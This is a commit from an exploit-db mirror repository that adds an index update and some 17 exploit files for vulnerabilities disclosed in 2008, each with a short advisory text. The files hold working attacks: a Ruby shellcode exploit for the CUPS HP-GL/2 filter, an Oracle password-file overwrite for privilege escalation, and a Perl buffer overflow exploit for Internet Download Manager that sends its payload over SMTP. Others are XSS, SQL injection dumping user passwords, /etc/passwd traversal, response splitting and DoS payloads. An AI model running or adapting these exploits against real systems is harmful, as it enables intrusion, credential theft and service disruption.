bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_25_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-25 04:32:15 +00:00
parent 9a08d1bcc1
commit 5deeb6c5d1
19 changed files with 573 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
files.csv
View file

@ -29222,3 +29222,21 @@ id,file,description,date,author,platform,type,port
32455,platforms/php/webapps/32455.pl,"Website Directory 'index.php' Cross-Site Scripting Vulnerability",2008-10-03,"Ghost Hacker",php,webapps,0
32456,platforms/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 'rnto' Command Directory Traversal Vulnerability",2008-10-03,dmnt,windows,remote,0
32457,platforms/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 'cds.php' SQL Injection Vulnerability",2008-10-03,"Jaykishan Nirmal",windows,remote,0
32458,platforms/multiple/remote/32458.txt,"OpenNMS 1.5.x HTTP Response Splitting Vulnerability",2008-10-05,"BugSec LTD",multiple,remote,0
32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 'action' Parameter Cross Site Scripting Vulnerability",2008-10-05,"Mazin Faour",java,webapps,0
32460,platforms/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 'phonebook.php' SQL Injection Vulnerability",2008-10-06,"Jaykishan Nirmal",windows,remote,0
32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 'index.php' SQL Injection Vulnerability",2008-10-03,S_DLA_S,php,webapps,0
32462,platforms/php/webapps/32462.txt,"Simple Machines Forum 1.1.6 HTTP POST Request Filter Security Bypass Vulnerability",2008-10-06,WHK,php,webapps,0
32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
32465,platforms/windows/remote/32465.pl,"Internet Download Manager <= 4.0.5 File Parsing Buffer Overflow Vulnerability",2008-10-06,Ciph3r,windows,remote,0
32466,platforms/multiple/remote/32466.html,"Mozilla Firefox <= 3.0.3 Internet Shortcut Same Origin Policy Violation Vulnerability",2008-10-07,"Liu Die Yu",multiple,remote,0
32467,platforms/php/webapps/32467.txt,"Opera Web Browser <= 8.51 URI Redirection Remote Code Execution Vulnerability",2008-10-08,MATASANOS,php,webapps,0
32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI 'DFF_config[dir_include]' Parameter Multiple Remote File Include Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0
32469,platforms/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point 'system.sysName.0' SNMP HTML Injection Vulnerability",2008-10-09,"Adrian Pastor",hardware,remote,0
32470,platforms/linux/remote/32470.rb,"CUPS <= 1.3.7 'HP-GL/2' Filter Remote Code Execution Vulnerability",2008-10-09,regenrecht,linux,remote,0
32471,platforms/linux/dos/32471.txt,"KDE Konqueror 3.5.9 JavaScript 'load' Function Denial of Service Vulnerability",2008-10-10,"Jeremy Brown",linux,dos,0
32472,platforms/hardware/dos/32472.txt,"Nokia Web Browser for S60 Infinite Array Sort Denial of Service Vulnerability",2008-10-10,"Luca Carettoni",hardware,dos,0
32473,platforms/php/webapps/32473.txt,"'com_jeux' Joomla! Component 'id' Parameter SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0
32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 'index.php' Cross-Site Scripting Vulnerability",2008-10-11,d3v1l,php,webapps,0
32475,platforms/multiple/remote/32475.sql,"Oracle Database Server <= 11.1 'CREATE ANY DIRECTORY' Privilege Escalation Vulnerability",2008-10-13,"Paul M. Wright",multiple,remote,0

Can't render this file because it is too large.

7
platforms/hardware/dos/32472.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31703/info
Nokia Web Browser for S60 is prone to a denial-of-service vulnerability when handling malicious HTML files.
A successful exploit of this issue allows remote attackers to consume excessive system resources in the affected browser, which will cause the application to crash and deny service to legitimate users. Attackers may also be able to run arbitrary code, but this has not been confirmed.
<script> foo = new Array(); while(true) {foo = new Array(foo).sort();} </script>

9
platforms/hardware/remote/32469.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31666/info
The Proxim Tsunami MP.11 2411 Wireless Access Point is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.
Attacker-supplied HTML and script code would run in the context of the web interface of the affected device, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
This issue is reported in the Tsunami MP.11 Model 2411; additional products may also be vulnerable.
$ snmpset -v1 -c public 192.168.1.100 sysName.0 s&#039;"><script>alert(1)</script>&#039;

9
platforms/java/webapps/32459.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31580/info
Kontiki Delivery Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Kontiki Delivery Management System 5.0 and prior versions are vulnerable.
http://www.example.com/zodiac/servlet/zodiac?action=%3Cscript%3Ealert(document.cookie)%3C/script%3E

9
platforms/linux/dos/32471.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31696/info
KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted JavaScript code.
An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.
The issue affects Konqueror 3.5.9; other versions may also be affected.
<!--- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Tested on Ubuntu 8.04 + Konqueror 3.5.9 A product of my fuzzing projects :) --> <html> <script type="text/javascript"> document.load(''); </script> </html>

185
platforms/linux/remote/32470.rb Executable file
View file

@ -0,0 +1,185 @@
source: http://www.securityfocus.com/bid/31688/info
CUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition. Note that local users may also exploit this vulnerability to elevate privileges.
Successful remote exploits may require printer sharing to be enabled on the vulnerable system.
The issue affects versions prior to CUPS 1.3.9.
NOTE: This issue was previously discussed in BID 31681 (Apple Mac OS X 2008-007 Multiple Security Vulnerabilities), but has been assigned its own record to better document the vulnerability.
#!/usr/bin/ruby -w
# CUPS 1.3.7 (HP-GL/2 filter) remote code execution
# gives uid=2(daemon) gid=7(lp) groups=7(lp)
# linux 2.6.25/randomize_va_space = 1, glibc 2.7
#
# An Introduction to HP-GL/2 Graphics
# http://www.tech-diy.com/HP%20Graphics%20Language.htm
# Internet Printing Protocol/1.1: Encoding and Transport
# http://tools.ietf.org/html/rfc2910
# Internet Printing Protocol/1.1: Model and Semantics
# http://tools.ietf.org/html/rfc2911
# :::::::::::::::::::::::::::::::::: setup ::::::::::::::::::::::::::::::::::
host = '127.0.0.1'
port = 631
printer = 'Virtual_Printer'
Pens_addr = 0x08073600 # objdump -T hpgltops | grep Pens$
fprintf_got = 0x080532cc # objdump -R hpgltops | grep fprintf
# linux_ia32_exec - CMD=/bin/touch /tmp/yello Size=84, metasploit.com
# encoder=PexFnstenvSub, restricted chars: 0xff
shellcode =
"\x2b\xc9\x83\xe9\xf1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7c" +
"\x48\x22\xd6\x83\xeb\xfc\xe2\xf4\x16\x43\x7a\x4f\x2e\x2e\x4a\xfb" +
"\x1f\xc1\xc5\xbe\x53\x3b\x4a\xd6\x14\x67\x40\xbf\x12\xc1\xc1\x84" +
"\x94\x5e\x22\xd6\x7c\x67\x40\xbf\x12\x67\x56\xb9\x09\x2b\x4a\xf6" +
"\x53\x3c\x4f\xa6\x53\x31\x47\xba\x10\x27\x22\x81\x2f\xc1\xc3\x1b" +
"\xfc\x48\x22\xd6";
# :::::::::::::::::::::::::::::::::: code :::::::::::::::::::::::::::::::::::
# beacause of hpgl-attr.c:68-73 and 269-274
def CR_setup()
"CR0,1,0,1,0,1;"
end
# PS is a bit tricky here. final weight of pen (PW code) is calculated as:
# weight*=hypot(ps[0],ps[1])/1016.0*72.0 (which is NOT hypot/73152.0),
# where ps0=72.0*arg1/1016.0 and ps1=72.0*arg2/1016.0.
# so, hoping to get things accurate I set multiplier to 1.0
def PS_setup()
"WU1;" + # set the units used for pen widths
"RO0;" + # (do not) rotate the plot
"PS0,199.123455;"; # set the plot size
end
# alternative approach to fight floating point rounding errors
# first one seems to be more successful, though
def PS_setup_alt()
"WU0;" +
"RO0;";
end
# set the pen width (PS!)
def PW(width, pen)
"PW#{width},#{pen};"
end
def PW_alt(width, pen)
"PW#{width*25.4/72.0},#{pen};"
end
# "Set the pen color..."
def PC(pen, r, g, b)
"PC#{pen},#{r},#{g},#{b};"
end
# we'll be storing shellcode in Pens[1024] static buffer
# typedef struct
# {
# float rgb[3]; /* Pen color */
# float width; /* Pen width */
# } pen_t;
def memcpy(data)
while (data.length % 16 != 0)
data += "\x90";
end
s = ''
a = 0, b = 0, i = 0
data.unpack('f*').each { |f|
case ((i += 1) % 4)
when 1: a = f
when 2: b = f
when 3: s += PC(i/4, a, b, f)
else s += PW(f, (i-1)/4)
end
}
return s;
end
# overwrite all 16 bytes with the same value
def poke(addr, value)
f = [value].pack('i').unpack('f') # floatyfication!
i = (addr-Pens_addr)/16
return PC(i, f, f, f) + PW(f, i)
end
hpgl_data =
"BP;" + # to be recognized by CUPS
CR_setup() +
PS_setup() +
memcpy(shellcode) +
poke(fprintf_got, Pens_addr) +
PC(0, 0, 0, 0); # whatever
def attribute(tag, name, value)
[tag].pack('C') +
[name.length].pack('n') +
name +
[value.length].pack('n') +
value
end
# tag - meaning (rfc2910#section-3.5)
# 0x42 nameWithoutLanguage
# 0x45 uri
# 0x47 charset
# 0x48 naturalLanguage
operation_attr =
attribute(0x47, 'attributes-charset', 'utf-8') +
attribute(0x48, 'attributes-natural-language', 'en-us') +
attribute(0x45, 'printer-uri', "http://#{host}:#{port}/printers/#{printer}") +
attribute(0x42, 'job-name', 'zee greeteengz') +
attribute(0x42, 'document-format', 'application/vnd.hp-HPGL');
ipp_data =
"\x01\x00" + # version-number: 1.0
"\x00\x02" + # operation-id: Print-job
"\x00\x00\x00\x01" + # request-id: 1
"\x01" + # operation-attributes-tag
operation_attr +
"\x02" + # job-attributes-tag
"\x03" + # end-of-attributes-tag
hpgl_data;
http_request =
"""POST /printers/#{printer} HTTP/1.1
Content-Type: application/ipp
User-Agent: Internet Print Provider
Host: #{host}
Content-Length: #{ipp_data.length}
Connection: Keep-Alive
Cache-Control: no-cache
"""
require 'socket'
NL = "\r\n"
if (false)
# ./hpgltops 0 none none 1 '' output.hpgl
puts hpgl_data
puts "[+] dumping HP/GL-2 into output.hpgl"
f = File.new('output.hpgl', 'w')
f.write(hpgl_data)
f.close()
exit(0)
end
puts "[+] connecting to #{host}:#{port}"
s = TCPSocket.open(host, port)
puts "[+] asking #{printer} for a printout"
http_request.each_line { |line|
s.write(line.strip + NL)
}
s.write(NL)
s.write(ipp_data)
s.read(1)
s.close()
puts "[+] done"

10
platforms/multiple/remote/32458.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31577/info
OpenNMS is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
Versions prior to OpenNMS 1.5.94 are vulnerable.
http://www.example.com/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text
/html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!--

24
platforms/multiple/remote/32466.html Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/31611/info
Mozilla Firefox is prone to a vulnerability that allows attackers to violate the same-origin policy. This issue occurs because the application fails to properly enforce the same-origin policy when handling internet shortcut files.
An attacker may create a malicious webpage that can access the properties of another domain. This may allow the attacker to obtain sensitive information or launch other attacks against a user of the browser.
Firefox 3.0.1 through 3.0.3 for Microsoft Windows are vulnerable; other versions may also be affected.
'testurl1.url':
[InternetShortcut]
URL=about:cache?device=memory
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
'testurl2.url':
[InternetShortcut]
URL=about:cache?device=disk
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
<script> function a() { s=""; h=""; for(i=0;i<window.frames.length;i++) { d=window.frames[i].document; for(j=0;j<d.links.length;j++) { u=d.links[j].text s+=u+"\n"; h+="<img src=\""+u+"\">"; } } document.getElementById("t").value=s; document.getElementById("x").innerHTML=h; } </script> <a href="javascript:a();">Start Test</a><br> <a href="javascript:window.location=location.href">Load This Page Again</a><br> <br> <br> <b>List of files that you recently fetched from the internet:</b><br> <textarea rows="10" cols="100" id=t wrap=off>&lt;/textarea&gt; <br> <br> <b>List of images that you recently viewed on the internet:</b><br> <div id=x></div> <br> <br> <iframe width=300 height=200 src="testurl1.url"></iframe> <iframe width=300 height=200 src="testurl2.url"></iframe>

39
platforms/multiple/remote/32475.sql Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/31738/info
Oracle Database Server is prone to a privilege-escalation issue related to the 'CREATE ANY DIRECTORY' user privilege.
Attackers may exploit this issue to gain full SYSDBA privileges on the vulnerable database server.
This issue affects Oracle Database 10.1, 10.2, and 11g; additional versions may also be vulnerable.
--note windows adds 0D 0A to end as cTRL LF
--WINDOWS VERSION 10.1
DECLARE fi UTL_FILE.FILE_TYPE;
bu RAW(32767);
bu2 varchar2(32767);
bu3 varchar2(32767);
BEGIN
bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b5a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776f72642066696c650000001b004f52434c000000000000000000000000000000000000000000000000000004000100000000000000000000000000000000000000000000000000000000000000494e5445524e414c000000000000000000000000000000000000000000000000080000003736394330434438343946394238423200000000000000000000000000000000100000000f000000000000000000000000000000000000000000000000000000000000005359530000000000000000000000000000000000000000000000000000000000030000003536333832323844414635323830354600000000000000000000000000000000100000000f');
bu3:=hextoraw('0000000000000000000000000000000000000000000000000000000000000000000000000000000782af445359534d414e0000000000000000000000000000000000000000000000000000060000004138443641453346343145463931454100000000000000000000000000000000100000000b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004344544553540000000000000000000000000000000000000000000000000000060000003134383041443332443038423045433900000000000000000000000000000000100000000b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000');
bu := hextoraw(bu2||bu3);
fi:=UTL_FILE.fopen('TESTPASS','PWDorcl.ora','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/
--linux adds 0A as LF
--LINUX VERSION 10.2.0.1
DECLARE fi UTL_FILE.FILE_TYPE;
bu RAW(32767);
bu2 varchar2(32767);
bu3 varchar2(32767);
BEGIN
bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b5a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776f72642066696c650000001b004f52434c000000000000000000000000000000000000000000000000000004000100000000000000000000000000000000000000000000000000000000000000494e5445524e414c000000000000000000000000000000000000000000000000080000003736394330434438343946394238423200000000000000000000000000000000100000000f000000000000000000000000000000000000000000000000000000000000005359530000000000000000000000000000000000000000000000000000000000030000003536333832323844414635323830354600000000000000000000000000000000100000000f');
bu3:=hextoraw('0000000000000000000000000000000000000000000000000000000000000000000000000000000782af445359534d414e0000000000000000000000000000000000000000000000000000060000004138443641453346343145463931454100000000000000000000000000000000100000000b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004344544553540000000000000000000000000000000000000000000000000000060000003134383041443332443038423045433900000000000000000000000000000000100000000b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000');
bu := hextoraw(bu2||bu3);
fi:=UTL_FILE.fopen('TESTPASS','orapworcl','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/

10
platforms/php/webapps/32461.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31592/info
AmpJuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AmpJuke 0.7.5 is vulnerable; other versions may also be affected.
http://www.example.com/ampjukedemo/index.php?what=performerid&start=0&count='20&special=-2/**/UNION/**/SELECT/**/1,concat(name,0x3A7C3A,password)/**/FROM/**/user/**/WHERE/**/id=1/*

9
platforms/php/webapps/32462.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31594/info
Simple Machines Forum (SMF) is prone to a security-bypass vulnerability because the application fails to sufficiently sanitize user-supplied input.
Attackers can exploit this issue to bypass filter restrictions and post spam content onto the affected site. Other attacks are also possible.
SMF 1.1.6 is vulnerable; other versions may also be affected.
[b]ht[b][/b]tp://www.ex[i][/i]ample.com/[/b]

9
platforms/php/webapps/32463.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31595/info
PHP Web Explorer is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files and execute local scripts within the context of the webserver process. A successful attack can allow the attacker to obtain sensitive information or gain unauthorized access to an affected computer in the context of the vulnerable server.
PHP Web Explorer 0.99b is vulnerable; other versions may also be affected.
http://www.example.com/main.php?refer=d&d=../../../etc

9
platforms/php/webapps/32464.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31595/info
PHP Web Explorer is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files and execute local scripts within the context of the webserver process. A successful attack can allow the attacker to obtain sensitive information or gain unauthorized access to an affected computer in the context of the vulnerable server.
PHP Web Explorer 0.99b is vulnerable; other versions may also be affected.
http://www.example.com/edit.php?file=../../../etc/passwd

11
platforms/php/webapps/32467.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31631/info
Opera Web Browser is prone to a remote code-execution vulnerability.
Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application or cause a denial-of-service condition.
NOTE: The security-bypass issue has been reassigned to BID 31643 (Opera Cached Java Applet Privilege Escalation Vulnerability).
Versions prior to Opera 9.60 are vulnerable.
http://BBB...BBB:password@example.com

13
platforms/php/webapps/32468.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/31644/info
DFFFrameworkAPI is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=
http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=
http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=
http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=
http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=
http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=
http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=

10
platforms/php/webapps/32473.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31731/info
The 'com_jeux' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?id=[SQL]&option=com_jeux&act=view&Itemid=2
http://www.example.com/index.php?id=-1691+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password)KHG,11,12,13,14,15,16,17,18+from+jos_users--&option=com_jeux&act=view&Itemid=2

9
platforms/php/webapps/32474.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31732/info
EEB-CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
EEB-CMS 0.95 is affected; other versions may be vulnerable as well.
http://www.example.com/index.php?content="><script>alert("test")</script>

9
platforms/windows/remote/32460.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31586/info
XAMPP for Windows is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
XAMPP 1.6.8 for Windows is vulnerable; other versions may also be affected.
http://www.example.com/xampp/phonebook.php?action=del&id=1 or 1

174
platforms/windows/remote/32465.pl Executable file
View file

@ -0,0 +1,174 @@
source: http://www.securityfocus.com/bid/31603/info
Internet Download Manager (IDM) is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This vulnerability may be related to the issue described in BID 14159 (Internet Download Manager Buffer Overflow Vulnerability), but this has not been confirmed.
We don't know which versions of IDM are affected. We will update this BID when more information emerges.
#!/usr/bin/perl
use IO::Socket;
use MIME::Base64;
$hostName = $ARGV[0];
$emailaddy = $ARGV[1];
$sock = IO::Socket::INET->new (Proto => "tcp", PeerAddr => $hostName, PeerPort => 25, Type => SOCK_STREAM);
$sock or die "no socket :$!\n";
print $sock "EHLO [192.168.1.7]\r\n" .
"MAIL FROM:<root>\r\n" .
"RCPT TO:<$emailaddy>\r\n" .
"DATA\r\n" .
"To: Ciph3r\Ciph3r_blackhat@example.com\r\n" .
"Message-Id: <436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D\www.Expl0iters.ir\r\n" .
"Content-Type: multipart/mixed; boundary=Apple-Download-3-188295813\r\n" .
"From: root <root>\r\n" .
"Subject: Dude you have to see this shit!\r\n" .
"Date: Mon, 5 oct 2008 \r\n" .
"X-Downloader: Apple Download (2.746.2)\r\n" .
"\r\n" .
"\r\n" .
"--Apple-Download-3-188295813\r\n" .
"Content-Type: multipart/appledouble;\r\n" .
"\tboundary=Apple-Download-4-188295813\r\n" .
"Content-Disposition: attachment\r\n" .
"\r\n" .
"\r\n" .
"--Apple-Download-4-188295813\r\n" .
"Content-Transfer-Encoding: base64\r\n" .
"Content-Type: application/applefile;\r\n" .
"\tname=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n" .
"Content-Disposition: attachment;\r\n" .
"\tfilename*1=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\r\n" .
"\r\n";
$retaddr = "\x41\x42\x43\x44"; # Shit the spec says printable ASCII!
$bufferz =
"\x00\x05\x16\x07". # AppleDouble Magic Number
"\x00\x02\x00\x00". # Version 2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of <null> filler
"\x00\x03\x00\x00". # Number of entries (3)
"\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info'
"\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e
"\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10
"\x00\x03\x00\x00". # Entry ID 3 is for 'Download'
"\x00\x48\x00\x00". # Start of Download data is at file offset 0x48
"\x00\xf5\x00\x00". # Length of Download is 0xf5 or 245
"\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'
"\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d
"\x05\x3a\x00\x00". # Length of Resource fork is 0x053a
"\x00\x00\x00\x00". # <null> filler
"\x00\x00\x00\x00". # <null> filler
"aa" x 109 . "0000" . "1111" . "2222" . "$retaddr" x 1 . "3333" . "zzz.mov." .
# No fscking clue what this is... it is stolen from MetaSploit.
# I think its just a resource fork.
"\x00\x01\x00\x00\x00\x05\x08\x00\x00\x04\x08\x00\x00\x00\x32\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x04\x04\x00\x00\x00\x25\x2f\x41\x70\x70\x6c\x69".
"\x63\x61\x74\x69\x6f\x6e\x73\x2f\x55\x74\x69\x6c\x69\x74\x69\x65".
"\x73\x2f\x54\x65\x72\x6d\x69\x6e\x61\x6c\x2e\x61\x70\x70\x00\xec".
"\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
